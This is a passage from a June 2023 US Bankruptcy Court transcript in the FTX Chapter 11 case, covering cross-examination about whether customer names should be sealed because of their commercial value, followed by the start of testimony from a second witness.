14 but even beyond that, to the extent that there were customers

15 who, at one time or another add material balances and/or

16 traded significantly on the exchange and generated material

17 value for the exchange, those types of customers would be

18 valuable, I believe, to the exchange going forward.

19     And the customer lists that we're talking about, I

20 think, would be valuable to third parties if they were

21 interested in acquiring that, because, ultimately, they're

22 not focused on whether there's a balance at the time of the

23 filing; they're focused on the extent to which those

24 customers would trade and generate revenue for them going

25 forward.

1   Q     Mr. Cofsky, how did the results of the analysis you did

2   inform you view, if at all, as to whether or not disclosure

3   of the customer names on their own would jeopardize the

4   debtors' ability to maximize value?

5   A     He reinforced that belief.  They validated that belief

6   that those customers could be identified with reasonable

7   effort and that to the extent that the names alone were not

8   redacted and were released, customers would -- clients, other

9   third parties that would otherwise need to expend resources

10  not to solicit those customers and/or would need to

11  compensate the debtor in order to acquire those identities,

12  would no longer have an interest in doing so or would have a

13  lesser, significantly lesser interest in doing so.

14  Q     And does your view as to value of individual -- of

15  customer names include both, individual and institutional

16  customers contained on the customer lists?

17  A     Yes, that's correct.

18              MR. GLUECKSTEIN:  No further questions, Your

19  Honor.

20              THE COURT:  Thank you.

21              Cross?

22              MR. WENDER:  Actually, Your Honor, there's

23  additional, just some additional direct, please?

24              THE COURT:  Oh, go ahead.  Yep.

25              MR. WENDER:  Thank you, Your Honor.  For the

1   record, David Wender with Eversheds Sutherland, counsel for

2   the Ad Hoc Committee of Non-U.S. Customers.

3                        DIRECT EXAMINATION (Continued)

4   BY MR. WENDER:

5   Q      Good afternoon, Mr. Cofsky.

6          Just a few short questions, because you spoke about

7   disclosing the names and how that might impact the value.

8          The disclosure of the names or customer information,

9   either by the debtor or other parties, that would similarly

10  impact value; is that your understanding or belief?

11  A      Yes, my belief is that disclosure of the names,

12  regardless of who disclosed them, would degrade value.

13  Q      This might be a dumb question and I apologize:  Are you

14  familiar with Bankruptcy Rule 2019?

15  A      Not by the number.

16  Q      That's appropriate.

17         It's a rule that requires when customers or creditors

18  act in concert, they have to disclose names, address, and

19  information relative to holdings.

20         If a group of creditors had to disclose their names,

21  their address, and holdings, would that be detrimental to the

22  value of those people, as well, and to the debtor?

23  A      My belief is that disclosure of any customer identities

24  would degrade value.

25  Q      Great.  Thank you.

**A0520**

1    THE COURT:  Now, cross-examination?

2    CROSS-EXAMINATION

3    BY MS. SARKESSIAN:

4    Q    Good afternoon, sir.  Juliet Sarkessian, on behalf of

5    the U.S. Trustee.  I do have a few questions for you.

6    Now, some of your testimony related to the value of the

7    customer names in a situation in which the debtors

8    reorganized, correct?

9    A    Correct.

10   Q    And based on either what you've heard today or your

11   familiarity with the debtors, do you have an understanding of

12   approximately when the debtors believe they're likely to get

13   a confirmed plan?

14   A    Yes, I have a -- I saw the work plan that was put on

15   the screen earlier.

16   Q    Right.  And it was second quarter, I believe, of next

17   year, correct?

18   A    I believe that's correct, yes.

19   Q    And do you understand whether from the petition date,

20   the customer accounts have all been frozen; is that right?

21   A    That's my understanding.

22   Q    Customers cannot get access to either their

23   cryptocurrency or cash that they have in the accounts; is

24   that right?

25   A    That's my understanding.

**A0521**

1  Q     And is it your understanding that that freeze would

2  continue at least until the plan was confirmed and then went

3  effective?

4  A    I believe that would be the case; that's my

5  understanding.

6  Q     And so that would be more than a year with these

7  accounts being frozen, correct?

8  A     Unfortunately, yes, I think that's the math.

9  Q     Customers can't even get to the cash that they have in

10 the accounts, right?

11 A    I believe that's correct, yes.

12 Q     So, with that in mind, does the fact that those

13 accounts have been frozen that long impact the value of the

14 customer list?  You know what?  I'm sorry, let me withdraw

15 that question.  I forgot that we were talking about

16 reorganization.

17       So, if the debtors reorganized, is it your belief that

18 spite having their accounts frozen for over a year, that the

19 debtors' customers will want to continue with the

20 reorganized -- continue to be customers with the reorganized

21 debtors?

22 A    I do.  I'm also hopeful that we can accomplish an

23 outcome in a shorter period of time, but yes, I believe that

24 at the time at which a reconstituted exchange is able to be

25 stood up and customers have the ability to trade on that, I

1  believe that they will want to do so.

2  Q     Can I ask you why you think that, for somebody who's

3  not been able to get the cash out of their accounts, let

4  alone, crypto, for over a year, that they're going to want to

5  continue with the company that froze their accounts?

6  A     Yes, it's a very good question.  We believe that if an

7  exchange is reorganized, it will be done so in a manner which

8  will be regulatorily complaint, will ensure that the custody

9  of the customer accounts going forward are unambiguously

10 secure, and will provide a trading platform that will be

11 first-class.  And if given the opportunity, from a number of

12 respects to participate on that exchange, as opposed to the

13 exchanges that are currently available to them, they would

14 much prefer to trade on that form of a platform.

15       And significantly, at the moment, and I believe highly

16 likely, the customers will be, by far, the largest creditors

17 of this estate and so if we reorganized the exchange going

18 forward, those customers would be equity owners, potentially,

19 of all, or a significant portion of that reorganized

20 exchange.  And so having the ability to transact on the

21 exchange where they are equity owners, as opposed to

22 transacting on another exchange where they're generating fees

23 for another exchange that they don't own, I think, would be

24 an easy question for them.  I think they would much prefer to

25 transact on an exchange where the fees that they're paying

1 | are ultimately benefiting their own equity holders.

2 | Q    Is the concept that you're talking about with the

3 | customers being equity holders, well, first of all, what

4 | percentage of the equity do you think the customers will

5 | actually hold?

6 |           MR. GLUECKSTEIN:  Objection, Your Honor.

7 | BY MS. SARKESSIAN:

8 | Q    Are we talking about 10 percent or --

9 |           MR. WENDER:  Objection, Your Honor.  I think we're

10 | getting pretty far afield.  And to the extent that we're

11 | talking about a plan that's in formation, I'm not sure that's

12 | appropriate testimony at this stage.

13 |           THE COURT:  Yeah, I don't know what the relevance

14 | would be at this time.

15 |           MS. SARKESSIAN:  Well, Your Honor, his testimony

16 | was that these customers, these names of customers are

17 | valuable if we reorganize --

18 |           THE COURT:  Uh-huh.

19 |           MS. SARKESSIAN:  -- with the idea that they're

20 | going to stay with the exchange.  And he said one of the

21 | reasons that they're going to stay with the exchange is

22 | they're going to be equity owners.  That was his testimony.

23 |           THE COURT:  That's one of the possible outcomes, I

24 | think he said.

25 |           MS. SARKESSIAN:  One of the possible outcomes.  So

**A0524**

 1  I'm asking him about that possible outcome.

 2          THE COURT:  What's the question?

 3          MS. SARKESSIAN:  The question is, when you're

 4  saying it's based on -- when you're saying your testimony is

 5  based on the assumption that they're going to be equity

 6  owners, what percentage of the equity are you anticipating

 7  that they would own?

 8          THE COURT:  Well, I think that's speculation at

 9  this point.

10          MR. GLUECKSTEIN:  Yeah, I would object, Your

11  Honor.  I think Ms. Sarkessian's question does misstate the

12  testimony, but I think this is all speculation at this point.

13          Mr. Cofsky simply testified as to one possible

14  outcome here.

15          THE COURT:  Sustained.

16          MS. SARKESSIAN:  Thank you, Your Honor.

17  BY MS. SARKESSIAN:

18  Q     Let me ask you a different question.

19         Your testimony that these customers would remain -- you

20  believe that these customers would remain with the FTX

21  platform in a reorganization and, therefore, their names are

22  valuable, is that based on an understanding that they would

23  be getting equity in lieu of getting their actual accounts

24  back, the money that's in their actual accounts?

25  A     I would hope that we can recover all of the value that

**A0525**

1  people put on the platform, but that remains uncertain.  And
2  so to the extent that those customers do not receive 100
3  percent of their funds back for any reason, they will have
4  incremental claims.  And it's those claims that I'm referring
5  to, which is the extent to which the estate will have assets
6  to satisfy those claims.

7      And I do want to be clear and also responsive to your
8  question, whether the exchange is reorganized or whether the
9  exchange is sold or whether he ever the exchange is part of a
10  partnership or receives investment from third parties for a
11  portion of the equity, a significant portion of the value of
12  that enterprise going forward, I believe, will be the
13  customers, their identity, and the extent to which they're
14  going to trade on this platform or another platform.

15      So, the questions that you asked were very good, it's
16  just that -- and I apologize for not being able to be more
17  specific, but we're at the early stages of evaluating which
18  one of those potential alternatives, we think will maximize
19  value.
20  Q    I understand there's a lot of suppositions in your
21  testimony, I was just trying to test them just to make sure I
22  fully understand what your testimony was based on.

23      So let me ask a different question.  You testified that
24  you also believe that the names of the customers would be
25  valuable -- that they could be monetized either just in and

1   of themselves, right, a customer list to be sold; is that

2   correct?

3   A     Yes, I think that's one alternative.

4   Q     And then they also could be monetized as part of a 363

5   sale, correct, was that also -- maybe I misstated it.

6   A     Yes, I think those may be the same thing, but selling

7   the customer lists solely or selling assets, together with

8   the customer lists, whether those assets include an exchange

9   or some other package of assets is one possibility I would

10  think.

11  Q     Okay.  And in connection with that, did you have an

12  opportunity to review the declaration of Jeremy Sheridan that

13  has been filed in support of this motion?

14  A     I did not.

15  Q     Okay.

16         MS. SARKESSIAN:  Just one moment, Your Honor.  I'm

17  sorry.

18         (Pause)

19  BY MS. SARKESSIAN:

20  Q     Are you aware whether Mr. Sheridan -- sorry -- are you

21  aware of whether the customers of FTX also used other

22  platforms, other cryptocurrency platforms?

23  A     I am not aware either way.

24  Q     Okay.  Now, I want to go to your testimony about

25  determining that you looked at your -- people you were

1  supervising, you indicated, looked at approximately 200

2  customers to see with just using their names, if more

3  information could be located, correct?

4  A    Yes, we looked at 200, precisely, and the objective was

5  to determine whether we could identify those individuals and

6  locate them.

7  Q    So that was my question, what was the other -- you were

8  looking for -- if you could find addresses, like, street

9  addresses or email addresses or both?

10  A    We wanted to determine using, again, limited resources,

11  which was just Google, LinkedIn, and Twitter, whether we

12  could identify and locate those individuals and find a way to

13  contact them.  And so that was the objective, was to

14  determine the extent to which solely the identities of those

15  individuals would be valuable.  And part of that value is

16  finding a way to actually locate these people and solicit

17  them if you're a competitor and you want to get them to trade

18  on your platform.

19  Q    And so that would be either a street address or an

20  email address or both?

21  A    Or --

22  Q    Or a telephone number?

23  A    Or another way to locate them, for example, on

24  Twitter --

25  Q    Oh, okay.

1  A       -- Facebook, other social media platforms.

2  Q       Now, of those 200, do you know how many of them were

3  individuals versus some type of corporate entity?

4  A       I don't know offhand.  That information was in the

5  spreadsheet, but I don't recall offhand.

6           MS. SARKESSIAN:  Those are all the questions I

7  have for this witness.

8           THE COURT:  Thank you.

9           MR. FINGER:  Good afternoon, Your Honor.

10           THE COURT:  Mr. Finger, good afternoon.

11           MR. FINGER:  David Finger of Finger & Slanina, on

12  behalf of the Media Intervenors.

13           At this time, I'd like to introduce to the Court,

14  Katie Townsend of the Reporters Committee for Freedom of the

15  Press.  She's an attorney with them.  Her admission *pro hac*

16  *vice* has been granted, and with the Court's permission, she

17  will present on behalf of the Media Intervenors.

18           THE COURT:  Okay.  Thank you.

19           MS. TOWNSEND:  Good afternoon, Your Honor.

20                     CROSS-EXAMINATION

21  BY MS. TOWNSEND:

22  Q     Good afternoon, Mr. Cofsky.

23        My name is Katie Townsend.  I'm one of the attorneys

24  representing the Media Intervenors in this matter.  I'll try

25  not to retread any ground that Ms. Sarkessian just covered.

**A0529**

1        But just to clarify, of the -- you have no idea sitting

2   here today how many of debtors' nine million customers are

3   already using a competitor platform; is that correct?

4   A    I do not know that sitting here today; that's correct.

5   Q    Of the top-200 customers that you directed your team to

6   take a look at, you don't know how many of those 200 are

7   already using a competitor platform, do you?

8   A    I do not know that.

9   Q    Does it matter for purposes of the value that you

10  ascribe to the customer base, whether or not those

11  individuals are using, or institutions, are already using

12  another platform?

13  A    To the extent that they are using another platform for

14  a longer period of time, that injection risk to that value.

15  It would degrade that value over time.  It wouldn't eliminate

16  that value, but, sure, we will be competing for those

17  customers.

18  Q    Just to be clear so I understand where the value here

19  is coming from, the value of the customer base is their

20  actual use of the platform, correct?  It's not their name;

21  it's whether or not they have an account on the platform; is

22  that accurate?

23  A    I don't think that's accurate if I understand the

24  question properly.  The customers are on the platform and

25  occur on the list that I reviewed, the nine million

1    customers, because they traded on the platform.  They,

2    therefore, are, because they traded on the platform and

3    generated revenues for the historical exchange, they,

4    therefore, would more likely than not, be folks who are

5    interested in crypto and would trade on crypto on another

6    exchange or on this exchange.

7         And so the identities of these clients as being

8    customers of FTX are valuable to competitors who are looking

9    to attract additional customers to their platform.  And it is

10   much more efficient for them to solicit the customers of FTX

11   directly to trade on their platform, as an example, than it

12   would be to just have a generalized marketing endeavor.

13   Q    But so long as those customers, even if they're trading

14   on that other platform, continue to trade on the FTX

15   platform, that doesn't affect the value of that customer to

16   FTX, does it?

17   A    Yes, it does.

18   Q    How so?

19   A    So, to the extent that we are not currently trading,

20   over time, the longer those customers are on another

21   platform, the greater the risk is.  It doesn't mean that they

22   become worthless, but it means that to the extent that we are

23   reorganizing the platform, and we're well aware of this, and

24   time is a critical issue, and so to the extent that we are

25   able to reorganize the platform in a short amount of time and

1   get these customers an environment that is secure and

2   regulatorily compliant that they can trade on, the less we

3   have to worry about a competing platform.

4        But like any business, to the extent that your

5   customers are utilizing services at a competitor, they're

6   less valuable to you.

7   Q    Let me ask it this way:  If all nine million of the

8   customers who had accounts at the FTX platform stopped using

9   that platform, the value of that asset, that customer base is

10  zero; is that fair to say?

11  A    No.

12  Q    What is the value of that asset if they are no longer

13  using the platform?

14  A    Well, those customers are no longer using the platform

15  today because it doesn't exist.  It doesn't mean that they

16  don't want to use the platform --

17  Q    Okay.

18  A    -- and it doesn't mean that they have declared that

19  they are never going to trade crypto, again.  I think, quite

20  to the contrary, as I said, with only 200 of the top

21  customers, their claims as of the petition date were

22  $2.4 billion.  I think those would be highly valuable

23  potential customers for any platform and people would pay a

24  lot of money to know who those people are and try to get them

25  to trade on their platform.  Whether they're on one platform

1  today, all the other platforms, I'm sure, would like to pay

2  to know who those people are.

3  Q    What's your basis for saying that you're sure that

4  other platforms would pay to know who those people are?

5  A    As was indicated in my original declaration, the other

6  exchanges have programs in place.  They pay money to look for

7  referral programs.  They pay commissions to solicit

8  customers.  So those customers are valuable and finding them

9  is worth paying for.  They've indicated that through their

10 actions.

11      And in our early stages of outreach, with respect to

12 the third-party process, we have received that input, that

13 the customer lists themselves are valuable to people.

14 Q    Have you done any kind of survey of customers to test

15 their views on whether they intend to stay with the platform,

16 whether it's reorganized or sold or continues in some other

17 fashion?

18 A    We have not had a formalized outreach process, but we

19 have had a long engagement and robust process.  The process

20 that I described for the potential reorganization and the

21 third-party outreach is being done, together with the

22 Unsecured Creditors Committee that represents those

23 customers, appeared we have regular conversations with the

24 members of the Committee themselves, who are customers.

25 Q    But you didn't attempt to undertake any other kind of

1  survey or research, in connection -- specific research to

2  ascertain that information, did you?

3  A    I want to make sure I'm -- we haven't undertaken a

4  broad-market analysis, but I want to make sure I'm answering

5  your question.

6      Is that what you're asking?

7  Q    You haven't attempted to specifically identify or do

8  any kind of, like I said, survey to identify how many of the,

9  let's say top-200 customers, would want to stay on --

10  continue to trade on the platform, have you?

11  A    I have not asked that, no.

12  Q    You testified previously that part of the basis for

13  your opinions were bids that you examined in the Celsius

14  bankruptcy; is that right?

15  A    I don't think I said that.

16  Q    I believe you testified on the January 12th, during the

17  January 12th second day hearing, that we also -- and this is

18  just to refresh your recollection:

19      We've also reviewed the bids that have been submitted

20  in the Voyager case and in the Celsius case and took note of

21  the fact that not only were customer assets and lists being

22  acquired in and a value ascribed to the business itself, but

23  that these were actually incremental elements of value, which

24  would be allocated to each customer that went on to the

25  acquirer's platform?

1          Do you recall that testimony?

2  A    I do.  I would prefer if you can put that in front of

3  me, if that's possible, if you're going to ask questions

4  about that.

5  Q    Sure.  If it's helpful, I don't intend to ask questions

6  about the testimony itself, but I did want to ask a little

7  bit about the bids that you've reviewed in the Celsius case.

8  A    I don't know that I said "bids."  I would like to see

9  what I said to make sure that -- I believe it was five months

10 ago and I want to make sure that I'm --

11 Q    Well, let me strike that.

12         Have you reviewed bids in the Celsius bankruptcy case?

13 A    In the Celsius case, yes, I did.

14 Q    Okay.  And there was recently a three-way auction in

15 that are bankruptcy case; is that correct?

16 A    That's correct.

17 Q    Okay.  And that three-way auction involved Fahrenheit,

18 which was the winning bidder; is that correct?

19 A    They have been selected as the highest and the best,

20 but they have not, to my knowledge, been approved by the

21 Bankruptcy Court yet.

22 Q    Okay.  And did you review Fahrenheit's bid in the

23 Celsius bankruptcy?

24 A    I did.  I'm not sure if it's proper for me to be

25 speaking anything further about that in this matter, given

1  the confidentiality agreements I have in that case, but yes,

2  I did.

3  Q    Well --

4        MR. GLUECKSTEIN:  Your Honor, I'm going to object

5  at this point.  Mr. Cofsky has not testified at all today

6  about anything in the record at this hearing with respect to

7  Celsius.  Counsel is now asking him about bids that are

8  pending before another Court that he may have reviewed

9  outside of his engagement for FTX, so I don't see how this is

10  either responsive to his direct testimony or appropriate.

11        MS. TOWNSEND:  Well, Your Honor, he previously

12  testified that part of the basis for his opinions and the

13  opinions that he's offering are bids that he reviewed in the

14  Celsius bankruptcy matter and in the Voyager bankruptcy

15  matter.  There have been some developments in those cases

16  that I think I'm entitled to ask him about, given that he's

17  here to update his testimony on things that he has learned or

18  what has proceeded since the January 11th hearing, so --

19        THE COURT:  Well, I think he testified that he

20  wasn't -- he didn't recall testifying that he had reviewed

21  bids and that's why he wanted to review the actual testimony

22  itself, but you didn't show him, so I'm not going to hold him

23  to that.

24        And if he has confidentiality agreements and he's

25  representing somebody else in connection with the Celsius

**A0536**

1   case, I'm not going to allow him to violate those

2   confidentiality agreements.

3           MS. TOWNSEND:  I'm happy to show him the

4   testimony, Your Honor.  He's already testified that in those

5   bids that he reviewed, there was incremental value attached,

6   not only to the customer base as a whole, but also the

7   individual customer names.  That's the entire basis of his

8   testimony, so I would like to explore that to some extent.

9           THE COURT:  Well, I don't know that it's the

10  entire basis of his testimony, but go ahead.

11          MS. TOWNSEND:  It's the value --

12          MR. GLUECKSTEIN:  Your Honor, it's certainly not

13  the entire basis and it's zero percent of his testimony

14  today.  And the bid that Counsel is asking him about now

15  didn't exist in January.  She's asking about a bid that, by

16  her recitation of this, was just put before the Celsius

17  Bankruptcy Court.

18          So, I renew my relevance objection.

19          THE COURT:  I sustain it.  Let's move on.

20          MS. TOWNSEND:  Just one moment.

21      (Pause)

22          MS. TOWNSEND:  No further questions, Your Honor.

23          THE COURT:  Thank you.

24          Any other cross?

25      (No verbal response)

**A0537**

 1                    THE COURT:  Redirect?

 2                    MR. GLUECKSTEIN:  No further questions, Your

 3    Honor.

 4                    THE COURT:  All right.  Thank you.

 5                    You may step down.  Thank you, Mr. Cofsky.

 6                    THE WITNESS:  Thank you.

 7          (Witness excused)

 8                    THE COURT:  And now we have Mr. Sheridan.  I'm

 9    anticipating he's going to take more than 25 minutes?

10                    MR. GLUECKSTEIN:  Yes, Your Honor.

11                    THE COURT:  And I hate to leave witnesses --

12                    MR. GLUECKSTEIN:  Including the cross-examination,

13    yes.

14                    THE COURT:  I hate to leave witnesses hanging

15    overnight if it's not necessary.  And since we're coming back

16    tomorrow morning, why don't we just pick up with Mr. Sheridan

17    in the morning.

18                    Anything else we can do in the meantime before we

19    recess for the day?

20                    MR. GLUECKSTEIN:  Your Honor, just to clarify,

21    what time would you like to resume tomorrow?

22                    THE COURT:  Let's start at 9:30.

23                    MR. GLUECKSTEIN:  9:30.  All right.  Thank you

24    very much, Your Honor.

25          (Counsel confers)

1            THE COURT:  All right.  Anything else before we

2  recess?

3            MR. GLUECKSTEIN:  Not from the debtors, Your

4  Honor.  Thank you.

5            THE COURT:  Okay.  Thank you.

6            We'll recess until 9:30 tomorrow morning.

7        (Proceedings concluded at 1:35 p.m.)

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

**A0539**

1                        CERTIFICATION

2              We certify that the foregoing is a correct

3      transcript from the electronic sound recording of the

4      proceedings in the above-entitled matter to the best of our

5      knowledge and ability.

6

7      /s/ William J. Garling                    June 8, 2023

8      William J. Garling, CET-543

9      Certified Court Transcriptionist

10     For Reliable

11

12     /s/ Tracey J. Williams                    June 8, 2023

13     Tracey J. Williams, CET-914

14     Certified Court Transcriptionist

15     For Reliable

16

17     /s/ Mary Zajaczkowski                     June 8, 2022

18     Mary Zajaczkowski, CET-531

19     Certified Court Transcriptionist

20     For Reliable

21

22     /s/ Coleen Rand                           June 8, 2023

23     Coleen Rand, CET-341

24     Certified Court Transcriptionist

25     For Reliable

**A0540**

```
 1                  UNITED STATES BANKRUPTCY COURT
                        DISTRICT OF DELAWARE
 2

 3   IN RE:                        .   Chapter 11
                                   .   Case No. 22-11068 (JTD)
 4   FTX TRADING LTD. et al.,      .
                                   .   (Jointly Administered)
 5                  Debtors.       .
                                   .
 6   . . . . . . . . . . . . . . . .

 7   AUSTIN ONUSZ, CEDRIC KESS VAN .   Adversary Proceeding
     PUTTEN, NICHOLAS J. MARSHALL  .   No. 22-50513 (JTD)
 8   and HAMAD DAR, on behalf of   .
     themselves and all others     .
 9   similarly situated,           .
                                   .
10                  Plaintiffs,    .
                                   .
11        v.                       .
                                   .
12   WEST REALM SHIRES INC., WEST  .
     REALM SHIRES SERVICES INC.    .
13   (D/B/A FTX US), FTX TRADING   .
     LTD., ALAMEDA RESEARCH LLC,   .
14   SAM BANKMAN-FRIED, ZIXIAO WANG, .
     NISHAD SINGH, and CAROLINE    .
15   ELLISON,                      .
                                   .
16                  Defendants.    .
                                   .
17   . . . . . . . . . . . . . . . .
                                   .
18   ALAMEDA RESEARCH LLC, ALAMEDA .   Adversary Proceeding
     RESEARCH LTD., FTX TRADING    .   No. 23-50145 (JTD)
19   LTD., WEST REALM SHIRES, INC., .
     and WEST REALM SHIRES, INC.,  .
20                                 .
                    Plaintiffs,    .
21                                 .
          v.                       .
22                                 .
     FTX DIGITAL MARKETS LTD., BRIAN .  Courtroom No. 5
23   C. SIMMS, KEVIN G. CAMBRIDGE, .   824 Market Street
     and PETER GREAVES, and J. DOES .   Wilmington, Delaware 19801
24   1-20,                         .
                    Defendants.    .   Friday, June 9, 2023
25   . . . . . . . . . . . . . . . .   9:30 a.m.
```

```
 1              TRANSCRIPT OF CONTINUED HEARING
            BEFORE THE HONORABLE JOHN T. DORSEY
 2              UNITED STATES BANKRUPTCY JUDGE

 3   APPEARANCES:

 4   For the Debtors and
     Debtors-in-Possession:   Adam G. Landis, Esquire
 5                            LANDIS RATH & COBB, LLP
                              919 Market Street
 6                            Suite 1800
                              Wilmington, Delaware 19801
 7
                              -and-
 8
                              Brian D. Glueckstein, Esquire
 9                            SULLIVAN & CROMWELL, LLP
                              125 Broad Street
10                            New York, New York 10004

11   For the US Trustee:      Juliet M. Sarkessian, Esquire
                              OFFICE OF THE UNITED STATES TRUSTEE
12                            UNITED STATES DEPARTMENT OF JUSTICE
                              844 King Street
13                            Suite 2207, Lockbox 35
                              Wilmington, Delaware 19801
14
     For the Ad Hoc
15   Committee of Non-US
     Customers of FTX.com:    David A. Wender, Esquire
16                            EVERSHEDS SUTHERLAND (US), LLP
                              999 Peachtree Street, NE
17                            Suite 2300
                              Atlanta, Georgia 30309
18

19   (APPEARANCES CONTINUED)

20   Audio Operator:          Jermaine Cooper, ECRO

21   Transcription Company:   Reliable
                              The Nemours Building
22                            1007 N. Orange Street, Suite 110
                              Wilmington, Delaware 19801
23                            Telephone: (302)654-8080
                              Email:  gmatthews@reliable-co.com
24
     Proceedings recorded by electronic sound recording,
25   transcript produced by transcription service.
```

```
 1   APPEARANCES (CONTINUED):

 2   For the Ad Hoc
     Committee of Customers
 3   and Creditors of FTX
     Trading Ltd., et al.:      Jeffrey S. Sabin, Esquire
 4                              VENABLE, LLP
                                151 West 42nd Street
 5                              New York, New York 10036

 6   For the Official
     Committee of
 7   Unsecured Creditors:       Kenneth Pasquale, Esquire
                                Isaac Sasson, Esquire
 8                              PAUL HASTINGS, LLP
                                200 Park Avenue
 9                              New York, New York 10166

10   For the Media
     Intervenors:              KatieLynn B. Townsend, Esquire
11                             REPORTERS COMMITTEE FOR FREEDOM OF
                                 THE PRESS
12                             1156 15th Street, NW
                               Suite 1020
13                             Washington, DC 20005

14   For the Joint
     Provisional Liquidators
15   of Emergent Fidelity
     Technologies, Ltd.:       Jason N. Zakia, Esquire
16                             WHITE & CASE, LLP
                               111 South Wacker Drive
17                             Suite 5100
                               Chicago, Illinois 60606
18

19

20

21

22

23

24

25
```

```
 1            (Proceedings commence at 9:30 a.m.)

 2                 THE COURT:  Thank you.  Please be seated.

 3                 MR. LANDIS:  Good morning, Your Honor.

 4                 THE COURT:  Good morning.

 5                 MR. LANDIS:  And may it please the Court, Adam

 6     Landis from Landis, Rath & Cobb on behalf of FTX Trading

 7     Limited and its affiliated debtors.

 8                 Your Honor, we're back on the agenda to finish up

 9     what we started yesterday in connection with Numbers 7 and 9.

10                 I can report to you, Your Honor, that the parties,

11     last night, did have conversations with respect to the JLPs'

12     lift-stay or request that the stay doesn't apply.  There has

13     been no resolution or narrowing of issues sufficient for you

14     not to rule, so the parties would request that you go ahead

15     and rule.

16                 We don't know if you'd like to go ahead with

17     Items 7 and 9 first, or if Your Honor --

18                 THE COURT:  Yes.

19                 MR. LANDIS:  -- would like to.

20                 THE COURT:  Let's finish up the agenda and then

21     we'll come back to that.

22                 MR. LANDIS:  Okay.  Fantastic.  So then we can

23     resume where we were with the sealing motion.

24                 THE COURT:  Okay.

25            (Participants confer)
```

1          MR. SASSON:  Good morning, Your Honor.

2          THE COURT:  Good morning.

3          MR. SASSON:  Isaac Sasson for the Official

4   Committee of Unsecured Creditors on the sealing motion.

5          Your Honor, I think where we left yesterday we

6   were going to call our second witness this morning, Mr.

7   Jeremy Sheridan.  So, with your permission, we'd like to do

8   that.

9          THE COURT:  Okay.  Mr. Sheridan, come forward.

10  Please take the stand and remain standing for the oath.

11         THE ECRO:  Please raise your right hand.  Please

12  state your first name and spell your last name for the court

13  record, please.

14         THE WITNESS:  My name is Jeremy Sheridan, last

15  name S-h-e-r-I-d-a-n.

16      JEREMY SHERIDAN, WITNESS FOR THE COMMITTEE, AFFIRMED

17         THE ECRO:  You may be seated.

18         Your Honor.

19         MR. SASSON:  May --

20         THE COURT:  You may proceed.

21         MR. SASSON:  Thank you, Your Honor.

22         As a preview, Mr. Sheridan filed a declaration in

23  support of the sealing motion at Docket Number 1325.  We'd

24  like to admit that declaration as his direct testimony and

25  supplement it with a brief direct, as well, this morning.  My

1  understanding is there are no objections, though the parties

2  reserve the right to cross Mr. Sheridan.

3          THE COURT:  Okay.  Is there any objection to the

4  entry of the declaration?

5          MS. SARKESSIAN:  Your Honor, I do not object to

6  the procedure of introducing the declaration, but there are

7  two portions of it that I do have an objection to, based on

8  hearsay.

9          THE COURT:  Okay.

10          MS. SARKESSIAN:  If I may approach?

11          THE COURT:  Yep.

12          MS. SARKESSIAN:  I mean approach --

13          THE COURT:  Let me --

14          MS. SARKESSIAN:  -- the podium.

15          THE COURT:  -- hear the --

16          MR. LANDIS:  Yep.

17          THE COURT:  Yes, the podium.

18          MS. SARKESSIAN:  Thank you, Your Honor.  For the

19  record, Juliet Sarkessian on behalf of the U.S. Trustee.

20          So, in Paragraph 18 of Mr. Sheridan's declaration,

21  he has a discussion of what happened in the Celsius case,

22  when then references certain documents that were filed.  We

23  do not object to the Celsius documents that were filed on the

24  docket being admitted, but we -- I do object to this witness'

25  testifying about the contents because the contents speak to

 1   them -- for themselves and I don't believe this gentleman has

 2   any involvement with personal knowledge of the Celsius case.

 3            THE COURT:  Which joint exhibit is the

 4   declaration?

 5            MR. SASSON:  Your Honor, it's not a joint exhibit.

 6   It's exhibit ...

 7        (Pause)

 8            MR. SASSON:  It's Exhibit I or exhibit -- it's at

 9   Docket Number 1570.

10            THE COURT:  Okay.  I'm going to need a copy

11   because I don't have it in front of me.

12            MR. SASSON:  Okay.  May I approach?

13            THE COURT:  Yes.

14        (Participants confer)

15            THE COURT:  And which paragraph are you on now,

16   Ms. Sarkessian?

17            MS. SARKESSIAN:  Paragraph 18, Your Honor.

18        (Participants confer)

19            MR. SASSON:  Oh, it's Paragraph 18 of Tab 1,

20   exhibits, Tab 1.

21        (Pause)

22            THE COURT:  Okay.  And I'm sorry.  State your

23   objection.  What's the basis for the objection?

24            MS. SARKESSIAN:  My objection is, while we do not

25   object to the actual court filings in Celsius on this issue

**A0547**

1   coming in, I do object to this gentleman's testimony about

2   the contents, which speak to themselves.  And I also don't

3   believe Mr. Sheridan has any personal knowledge about what

4   happened in Celsius.  But if I'm wrong about that, I can be

5   corrected.

6               THE COURT:  Okay.

7               MR. SASSON:  Your Honor, Mr. Sheridan is

8   testifying in his expert capacity as to the general knowledge

9   of what happened in the Celsius case.  He's allowed to rely

10  on the fact that it occurred and he's drawn suppositions from

11  that fact.

12              THE COURT:  I agree.  The objection is overruled.

13              MS. SARKESSIAN:  The next one, Your Honor, relates

14  to Paragraph 21 of Mr. Sheridan's declaration.  And this

15  relates to the first two sentences, which, again, appear to

16  be statements that are based on newspaper reports.

17              Now, to the extent that it's based on his personal

18  experience -- and the last piece of the paragraph talks about

19  his experience and I do not object to that.  But the first

20  two sentences appear to be testimony based on what is in

21  articles, newspaper articles, and we object to that as

22  hearsay.

23              THE COURT:  Okay.  Well, again, I think he's

24  relying on that as an expert witness to inform his opinion,

25  so I'll overrule the objection.

**A0548**

1          MS. SARKESSIAN:  Thank you, Your Honor.

2          MR. SASSON:  And --

3          THE COURT:  So the declaration is admitted.

4       (Sheridan Declaration received in evidence)

5          MR. SASSON:  Thank you, Your Honor.

6          And just for housekeeping purposes, in terms of

7   the exhibits to the declaration, we've spoken with counsel,

8   and we're only seeking at this point to admit:

9          Exhibit A, which is Mr. Sheridan's CV;

10          Exhibit I, which are the Celsius pleadings;

11          And Exhibit J, the Celsius transcript.

12          The rest of the exhibits are just referenced to

13   aid the reader in Mr. Sheridan's declaration.

14          THE COURT:  Okay.

15       (Sheridan Declaration Exhibits A, I, and J received in

16   evidence)

17          MS. TOWNSEND:  I just want to make it express --

18          THE COURT:  You have to go to the microphone,

19   please.

20          MS. TOWNSEND:  Thank you, Your Honor.  Katie

21   Townsend on behalf of the media intervenors.

22          I just wanted to make it express that we, of

23   course, reserve the right to rely on any of the exhibits that

24   are relied by Mr. Sheridan and are attached to the

25   declaration for impeachment purposes.

**A0549**

```
 1              THE COURT:  Of course, yep.
 2              MR. SUMMERS:  Thanks.
 3              MR. SASSON:  Your Honor, and with that, may I
